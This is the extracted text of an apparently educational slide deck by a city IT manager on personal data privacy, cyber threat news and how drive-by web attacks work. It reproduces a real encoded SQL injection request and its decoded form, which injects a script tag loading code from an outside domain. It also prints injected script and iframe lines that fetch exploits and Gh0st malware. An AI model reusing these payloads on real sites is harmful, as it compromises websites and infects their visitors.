Steven Narvaez CCIO / ITSD Mgr. City of Deltona East Central Florida District Director FLGISA 30 years of IT experience Two time winner of the Florida Local Government Information Systems Association (FLGISA.org) Technology Achievement Award Program under the category of "Most Innovative Use of Technology Award". FLGISA.ORG: What you need to know! WE ROCK!!! Do You Really Know Where Your Personal Information Is? See what information about you is available online Check out Spokeo and Pipl Massive amounts of data compiled from a variety of sources including public records and social networking sites about individuals. Can be used by credit issuers, criminal profilers, employers, and others for any number of purposes, not necessarily intended by the data service providers. Clean up the data you can control Review your accounts Three options: 1. 2. 3. remove the data modify the privacy settings request that the account be deleted. If you are going to request that the account be deleted, be sure to first remove all of the data. Be sure to confirm that the account is deleted versus deactivated. Request cleanup of data you don¹t control Contact site owners. Can’t find owners? Look it up using the ³WHOIS² service for an administrative and technical contact for the site. A “WHOIS” query can be done by visiting the website http://whois.net/ Opt out of data service providers. Request cleanup of data you don¹t control Data service providers provide lists of contact information to individuals or companies that request it. They often charge a fee for this information. Data service providers allow individuals to opt out of having their data published. Services are aggregators so the original source provider of the information will also likely have to be contacted to remove your information. The Privacy Rights Clearinghouse publishes the opt-out URL for over 240 of these types of services. Use a professional service. Be aggressive about maintaining a cycle of checking your public data and removing items which don¹t match your current risk tolerance. For More Information: Please visit: Privacy Rights Clearinghouse Opt-Out Urls: www.privacyrights.org/online-information-brokers-list · Google support page for removal of data: http://support.google.com/webmasters/bin/answer.py?hl =en&answer=164133&topic=1724262&ctx=topic · IT World Article, ³Rescue your Online Reputation²: www.itworld.com/itmanagementstrategy/212115/seven-ways-rescue-your-onlinereputation?page=0,2 · Times Article ³How to Fix (or Kill) Web Data About You²: www.nytimes.com/2011/04/14/technology/personaltech/14 basics.html?_r=0 Threat is real AND it is EVOLVING ALL THE TIME! US Power Co. cyber attacked 10,000 times a month! Could foreign hackers take out America's electric grid? A new congressional report says it's a very real threat, with more than a dozen of nearly 100 electric utilities surveyed reporting constant or frequent cyber attacks, Reuters reports. One utility said it was battered by a staggering 10,000 attacks a month; another reported daily such activity that is "automated and dynamic in nature, able to adapt to what is discovered during its probing process." China ISP takes internet for a ride Small Chinese ISP – IDC China Telecommunication briefly hijacked the internet by sending out wrong routing data Re-transmitted wrong routing data by state-owned China Telecommunications, affected service providers around the world. The event even made it into the '2010 US-China Economic and Security Review' commission report presented in November of that year to US Congress For 18 minutes on April 8, China Telecom rerouted 15 percent of the internet's traffic through Chinese servers, affecting US government and military web sites. Was / Is China testing a cyber attack capability? China Telecom called the April traffic re-direction an accident. China at Heart of Sweeping Cyber spying War on US The damage so far could range from $25 billion to $100 billion, or up to 0.5% of GDP government analysts report. Cyber spying is "just so widespread that it’s known to be a national issue at this point," says an Obama administration official. Russia, Israel, and France have also delved into electronic espionage Chinese officials deny such hacking. The New York Times and Wall Street Journal are among several newspapers to cite recent hacking, the Daily Intelligencer notes. McAfee's Oopsie McAfee goofs up! Issued a faulty anti-virus update The now-infamous McAfee DAT file 5958 which wreaked havoc on PCs of countless McAfee customers. Caused malfunctions like the Microsoft 'Blue Screen of Death' Created the effect of a denial-of-service. HTTP: A Criminal’s Best Friend Understanding the Problem in Four Parts 1. URL: Recipe for Disaster 2. Web Browser Ecosystem Vulnerable 3. Malware Defeats Anti-Virus Signatures 4. Web Servers Vulnerable The Web Page: A Security Primer How does a Web Page Work? 1. HTML: Web site “recipe.” Initial HTML retrieval provides “recipe". Browser then fetches all objects listed in initial HTML “recipe”. 2. Web Resources: The actual ingredients. Retrieved, per the HTML, from any specified location(s) Includes: • • • • Images Scripts Executable objects (“plug-ins”) Other web pages BoingBoing.net: A popular blog URLs in browser: 1 HTTP Gets: 162 Images: 66 from 18 domains including 5 separate 1x1 pixel invisible tracking images Scripts: 87 from 7 domains Cookies: 118 from 15 domains 8 Flash objects from 4 domains Recipe + Ingredients…Let’s cook! Web page HTML is the recipe Code snippets are web site ingredients The browser will fetch each ingredient Each ingredient initiates a HTTP transaction Understanding the Problem in Four Parts 1. URL: Recipe for Disaster 2. Web Browser Ecosystem Vulnerable 3. Malware Defeats Anti-Virus Signatures 4. Web Servers Vulnerable Web Browser Ecosystem Vulnerable SANS Institute Top 20 Security Risks http://www.sans.org/top20/#c1 IE and Firefox vulnerable “…hundreds of vulnerabilities in ActiveX controls installed by software vendors have been discovered.” Media Players & Browser Helper Objects (BHO) RealPlayer, iTunes, Flash, QuickTime, Windows Media Explosion of BHOs and third-party plug-ins Plug-ins are installed (semi) transparently by website(s). Users unaware an at-risk helper object or plug-in is installed … introducing more avenues for hackers to exploit users visiting malicious web sites. Understanding the Problem in Four Parts 1. URL: Recipe for Disaster 2. Web Browser Ecosystem Vulnerable 3. Malware Defeats Anti-Virus Signatures 4. Web Servers Vulnerable Malware Defeats Anti-Virus Signatures Criminals have developed tools to mutate malware to deflect signature-based detection. At a DefCon hacking conference, teams of researchers proved their success yet again. Seven viruses and two exploits, all well-known, were mutated to defeat multiple anti-virus engines Winning time: 2 hours, 25 minutes Attack Vector: Vulnerable Web Servers SANS Institute Top 20 Security Risks http://www.sans.org/top20/#c1 “Web application vulnerabilities account for almost half the total number of vulnerabilities being discovered in the past year**. These vulnerabilities are being exploited widely to convert trusted web sites into malicious servers serving client-side exploits and phishing scams.” ** including open-source and custom-built applications SQL Injection Attacks How does the attack work? 1. Web servers that present dynamic web pages often talk to databases to retrieve the data. 2. Web servers and databases use a popular language called Structured Query Language (SQL) to describe the data requested. 3. SQL can also insert new data and update existing data. 4. If a web server passes unvalidated input from fields on web forms to the database, attackers can take advantage of hacks to issue their own SQL commands. 5. Those hacks can inject malicious code into the database… 6. …and the web server will subsequently present this malicious code from the database to unsuspecting users when they visit the website. The process renders a formally good website into a malicious one without the knowledge of the site owner or the site’s visitors! Real-World SQL Injection HTTP Post made to thousands of web servers 2007-12-30 18:22:46 POST /crappyoutsourcedCMS.asp;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST (0×4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C004000430020007 6006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007 500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006 D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0 073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006 400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900 700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E0078007400790 0700065003D0032003300310020006F007200200062002E00780074007900700065003D00310036003700290020004F00500045004E0020 005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004 D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700 480049004C004500280040004000460045005400430048005F005300540041005400550053003D0030002900200042004500470049004E 00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200073006500740020005 B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E00760065007200740028007600610072006300680 0610072002C005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D 0068007400740070003A002F002F0063002E007500630038003000310030002E0063006F006D002F0030002E006A0073003E003C002F007 300630072006900700074003E0027002700270029004600450054004300480020004E004500580054002000460052004F004D0020002000 5400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E004400200 043004C004F005300450020005400610062006C0065005F0043007500720073006F00720020004400450041004C004C004F004300410054 00450020005400610062006C0065005F0043007500720073006F007200%20AS%20NVARCHAR(4000)); EXEC(@S);–178|80040e14|Unclosed_quotation_mark_before_the_character_string_’G;DECLARE_@S_NVARCHAR(4000); SET_@S=CAST(0×4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C004 00043002000′. - 202.101.162.73 HTTP/1.0 Mozilla/3.0+(compatible;+Indy+Library) - 500 15248 SQL Injection Decoded What that POST is attempting: …exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+’ '<script src=http://c.uc8010.com/0.js></script>’ '')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor DECLARE @T varchar(255)… Attack inserts script into text fields in database <script src=http://?.uc8010.com/0.js></script> Site owner unaware their site was hacked Site visitors will fetch the malicious script Script used to deliver any web attack Hacked While Browsing Behind the Scenes What’s Happening on BrookeSeidl.com brookeseidl.com registered at eNom 2002 63.249.17.64 hosted at Seattle’s ZipCon with 52 other domains Script injected onto web page – one extra ingredient! What Does Tejary.net/h.js Do? Browser fetches h.js javascript from tejary.net Tejary.net registered 2003 at GoDaddy and hosted on 68.178.160.68 in Arizona Registered by Aljuraid, Mr Nassir A in Saudi Arabia Tejary.net/h.js calls two remote iframe objects What Does said7.com Do? Browser fetches /Bb/faq.htm from www.said7.com Said7.com Registered 2006 at NAMESECURE.COM Hosted on 74.52.143.60 at ThePlanet, Houston, TX Calls web form from 51yes.com Calls v3i9.cn/c.htm as iFrame <script language="javascript" src="http://count49.51yes.com/click.aspx?id=4949530 24&logo=11"></script> <iframe src=http://www.v3i9.cn/c.htm width=100 height=0></iframe> Exploit Resources Fetched from v3i9.cn It all starts with /c.htm loaded from tejary.net, said7.com Real Player Exploit /ipp.htm – Real Player exploit CVE-2008-1309 2/40 AV anti-virus vendors detect, calls real.html. Includes f#!kyoukaspersky /real.htm, /real.js – Real Player exploit CVE-2007-5601 MDAC (Microsoft Data Access Component) Exploit /14.htm, /14.js – exploits Exploit-MS06-014 vulnerability in the MDAC functions Flash Exploit /swfobject.js – detects flash version and selects according content /flash.htm – Flash exploit. 2/40 anti-virus vendors detect /igg.htm - ??? Called from /flash.htm for exploit? What is Our Malware? After successful exploit, malware installed from v3i9.cn ce.exe = Gh0st malware Keylogging, web cam monitoring Persistent connection to China: 58.253.68.68 vobe.3322.org Anti-Virus Won’t Protect us Ce.exe analyzed on Virus Total 31% detection on days 1, 2 48% detection on day 3 21% detection for SMS.exe Protection - Prevention “The cost of protecting ourselves against cybercrime can far exceed the cost of the threat itself … [therefore] we should spend less in anticipation of cybercrime and more on catching the perpetrators.” “We distinguish carefully between traditional crimes that are now ‘cyber’ because they are conducted online (such as tax and welfare fraud); transitional crimes whose modus operandi has changed substantially as a result of the move online (such as credit card fraud); new crimes that owe their existence to the Internet; and what we might call platform crimes such as the provision of botnets which facilitate other crimes rather than being used to extract money from victims directly.” The Cost UK is spending ~$1 billion on efforts to protect against or clean-up after a threat, including $170 million on antivirus measures, but only $15 million is being spent on law enforcement to pursue cyber criminals. Shouldn’t we spend some time on stopping the threat by apprehending the criminals? Thank you for the opportunity to have this chat! Questions? Fade to BLACK